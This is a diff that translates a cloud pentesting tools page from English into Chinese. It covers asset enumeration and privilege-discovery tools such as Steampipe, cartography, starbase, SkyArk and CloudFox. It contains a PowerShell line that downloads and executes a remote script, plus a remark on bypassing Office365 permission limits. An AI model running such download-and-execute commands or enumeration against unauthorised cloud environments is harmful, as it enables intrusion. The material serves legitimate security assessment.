-To check **other GCP insights** (useful for enumerating services) use: [https://github.com/turbot/steampipe-mod-gcp-insights](https://github.com/turbot/steampipe-mod-gcp-insights) +要检查 **其他 GCP 见解**(用于枚举服务),请使用:[https://github.com/turbot/steampipe-mod-gcp-insights](https://github.com/turbot/steampipe-mod-gcp-insights) -To check Terraform GCP code: [https://github.com/turbot/steampipe-mod-terraform-gcp-compliance](https://github.com/turbot/steampipe-mod-terraform-gcp-compliance) +要检查 Terraform GCP 代码,请访问:[https://github.com/turbot/steampipe-mod-terraform-gcp-compliance](https://github.com/turbot/steampipe-mod-terraform-gcp-compliance) -More GCP plugins of Steampipe: [https://github.com/turbot?q=gcp](https://github.com/turbot?q=gcp) +更多 Steampipe 的 GCP 插件:[https://github.com/turbot?q=gcp](https://github.com/turbot?q=gcp) {{#endtab }} {{#tab name="AWS" }} - ```bash # Install aws plugin steampipe plugin install aws @@ -246,29 +225,27 @@ cd steampipe-mod-aws-compliance steampipe dashboard # To see results in browser steampipe check all --export=/tmp/output4.json ``` +要检查 Terraform AWS 代码: [https://github.com/turbot/steampipe-mod-terraform-aws-compliance](https://github.com/turbot/steampipe-mod-terraform-aws-compliance) -To check Terraform AWS code: [https://github.com/turbot/steampipe-mod-terraform-aws-compliance](https://github.com/turbot/steampipe-mod-terraform-aws-compliance) - -More AWS plugins of Steampipe: [https://github.com/orgs/turbot/repositories?q=aws](https://github.com/orgs/turbot/repositories?q=aws) +更多 AWS 的 Steampipe 插件: [https://github.com/orgs/turbot/repositories?q=aws](https://github.com/orgs/turbot/repositories?q=aws) {{#endtab }} {{#endtabs }} ### [~~cs-suite~~](https://github.com/SecurityFTW/cs-suite) -AWS, GCP, Azure, DigitalOcean.\ -It requires python2.7 and looks unmaintained. +AWS, GCP, Azure, DigitalOcean。\ +它需要 python2.7,并且看起来没有维护。 ### Nessus -Nessus has an _**Audit Cloud Infrastructure**_ scan supporting: AWS, Azure, Office 365, Rackspace, Salesforce. Some extra configurations in **Azure** are needed to obtain a **Client Id**. +Nessus 有一个 _**审计云基础设施**_ 扫描,支持:AWS, Azure, Office 365, Rackspace, Salesforce。在 **Azure** 中需要一些额外的配置以获取 **Client Id**。 ### [**cloudlist**](https://github.com/projectdiscovery/cloudlist) -Cloudlist is a **multi-cloud tool for getting Assets** (Hostnames, IP Addresses) from Cloud Providers. +Cloudlist 是一个 **多云工具,用于获取资产**(主机名,IP 地址)来自云服务提供商。 {{#tabs }} {{#tab name="Cloudlist" }} - ```bash cd /tmp wget https://github.com/projectdiscovery/cloudlist/releases/latest/download/cloudlist_1.0.1_macOS_arm64.zip @@ -276,46 +253,40 @@ unzip cloudlist_1.0.1_macOS_arm64.zip chmod +x cloudlist sudo mv cloudlist /usr/local/bin ``` - {{#endtab }} -{{#tab name="Second Tab" }} - +{{#tab name="第二个标签" }} ```bash ## For GCP it requires service account JSON credentials cloudlist -config ``` - {{#endtab }} {{#endtabs }} ### [**cartography**](https://github.com/lyft/cartography) -Cartography is a Python tool that consolidates infrastructure assets and the relationships between them in an intuitive graph view powered by a Neo4j database. 
+Cartography 是一个 Python 工具,它将基础设施资产及其之间的关系整合在一个由 Neo4j 数据库驱动的直观图形视图中。 {{#tabs }} {{#tab name="Install" }} - ```bash # Installation docker image pull ghcr.io/lyft/cartography docker run --platform linux/amd64 ghcr.io/lyft/cartography cartography --help ## Install a Neo4j DB version 3.5.* ``` - {{#endtab }} {{#tab name="GCP" }} - ```bash docker run --platform linux/amd64 \ - --volume "$HOME/.config/gcloud/application_default_credentials.json:/application_default_credentials.json" \ - -e GOOGLE_APPLICATION_CREDENTIALS="/application_default_credentials.json" \ - -e NEO4j_PASSWORD="s3cr3t" \ - ghcr.io/lyft/cartography \ - --neo4j-uri bolt://host.docker.internal:7687 \ - --neo4j-password-env-var NEO4j_PASSWORD \ - --neo4j-user neo4j +--volume "$HOME/.config/gcloud/application_default_credentials.json:/application_default_credentials.json" \ +-e GOOGLE_APPLICATION_CREDENTIALS="/application_default_credentials.json" \ +-e NEO4j_PASSWORD="s3cr3t" \ +ghcr.io/lyft/cartography \ +--neo4j-uri bolt://host.docker.internal:7687 \ +--neo4j-password-env-var NEO4j_PASSWORD \ +--neo4j-user neo4j # It only checks for a few services inside GCP (https://lyft.github.io/cartography/modules/gcp/index.html) @@ -326,17 +297,15 @@ docker run --platform linux/amd64 \ ## Google Kubernetes Engine ### If you can run starbase or purplepanda you will get more info ``` - {{#endtab }} {{#endtabs }} ### [**starbase**](https://github.com/JupiterOne/starbase) -Starbase collects assets and relationships from services and systems including cloud infrastructure, SaaS applications, security controls, and more into an intuitive graph view backed by the Neo4j database. +Starbase 收集来自服务和系统的资产和关系,包括云基础设施、SaaS 应用程序、安全控制等,形成一个直观的图形视图,支持 Neo4j 数据库。 {{#tabs }} {{#tab name="Install" }} - ```bash # You are going to need Node version 14, so install nvm following https://tecadmin.net/install-nvm-macos-with-homebrew/ npm install --global yarn @@ -359,44 +328,40 @@ docker build --no-cache -t starbase:latest . 
docker-compose run starbase setup docker-compose run starbase run ``` - {{#endtab }} {{#tab name="GCP" }} - ```yaml ## Config for GCP ### Check out: https://github.com/JupiterOne/graph-google-cloud/blob/main/docs/development.md ### It requires service account credentials integrations: - - name: graph-google-cloud - instanceId: testInstanceId - directory: ./.integrations/graph-google-cloud - gitRemoteUrl: https://github.com/JupiterOne/graph-google-cloud.git - config: - SERVICE_ACCOUNT_KEY_FILE: "{Check https://github.com/JupiterOne/graph-google-cloud/blob/main/docs/development.md#service_account_key_file-string}" - PROJECT_ID: "" - FOLDER_ID: "" - ORGANIZATION_ID: "" - CONFIGURE_ORGANIZATION_PROJECTS: false +- name: graph-google-cloud +instanceId: testInstanceId +directory: ./.integrations/graph-google-cloud +gitRemoteUrl: https://github.com/JupiterOne/graph-google-cloud.git +config: +SERVICE_ACCOUNT_KEY_FILE: "{Check https://github.com/JupiterOne/graph-google-cloud/blob/main/docs/development.md#service_account_key_file-string}" +PROJECT_ID: "" +FOLDER_ID: "" +ORGANIZATION_ID: "" +CONFIGURE_ORGANIZATION_PROJECTS: false storage: - engine: neo4j - config: - username: neo4j - password: s3cr3t - uri: bolt://localhost:7687 - #Consider using host.docker.internal if from docker +engine: neo4j +config: +username: neo4j +password: s3cr3t +uri: bolt://localhost:7687 +#Consider using host.docker.internal if from docker ``` - {{#endtab }} {{#endtabs }} ### [**SkyArk**](https://github.com/cyberark/SkyArk) -Discover the most privileged users in the scanned AWS or Azure environment, including the AWS Shadow Admins. It uses powershell. - +发现扫描的 AWS 或 Azure 环境中最特权的用户,包括 AWS Shadow Admins。它使用 powershell。 ```powershell Import-Module .\SkyArk.ps1 -force Start-AzureStealth @@ -405,18 +370,17 @@ Start-AzureStealth IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cyberark/SkyArk/master/AzureStealth/AzureStealth.ps1') Scan-AzureAdmins ``` - ### [Cloud Brute](https://github.com/0xsha/CloudBrute) -A tool to find a company (target) infrastructure, files, and apps on the top cloud providers (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode). +一个工具,用于在顶级云服务提供商(亚马逊、谷歌、微软、DigitalOcean、阿里巴巴、Vultr、Linode)上查找公司的(目标)基础设施、文件和应用程序。 ### [CloudFox](https://github.com/BishopFox/cloudfox) -- CloudFox is a tool to find exploitable attack paths in cloud infrastructure (currently only AWS & Azure supported with GCP upcoming). -- It is an enumeration tool which is intended to compliment manual pentesting. -- It doesn't create or modify any data within the cloud environment. +- CloudFox 是一个工具,用于查找云基础设施中的可利用攻击路径(目前仅支持 AWS 和 Azure,GCP 即将推出)。 +- 这是一个枚举工具,旨在补充手动 pentesting。 +- 它不会在云环境中创建或修改任何数据。 -### More lists of cloud security tools +### 更多云安全工具列表 - [https://github.com/RyanJarv/awesome-cloud-sec](https://github.com/RyanJarv/awesome-cloud-sec) @@ -446,16 +410,12 @@ aws-security/ azure-security/ {{#endref}} -### Attack Graph +### 攻击图 -[**Stormspotter** ](https://github.com/Azure/Stormspotter)creates an “attack graph” of the resources in an Azure subscription. It enables red teams and pentesters to visualize the attack surface and pivot opportunities within a tenant, and supercharges your defenders to quickly orient and prioritize incident response work. 
+[**Stormspotter** ](https://github.com/Azure/Stormspotter) 创建 Azure 订阅中资源的“攻击图”。它使红队和 pentesters 能够可视化攻击面和租户内的转移机会,并增强您的防御者快速定位和优先处理事件响应工作的能力。 ### Office365 -You need **Global Admin** or at least **Global Admin Reader** (but note that Global Admin Reader is a little bit limited). However, those limitations appear in some PS modules and can be bypassed accessing the features **via the web application**. +您需要 **Global Admin** 或至少 **Global Admin Reader**(但请注意,Global Admin Reader 有一些限制)。然而,这些限制出现在某些 PS 模块中,可以通过 **通过网络应用程序** 访问功能来绕过。 {{#include ../banners/hacktricks-training.md}} - - - -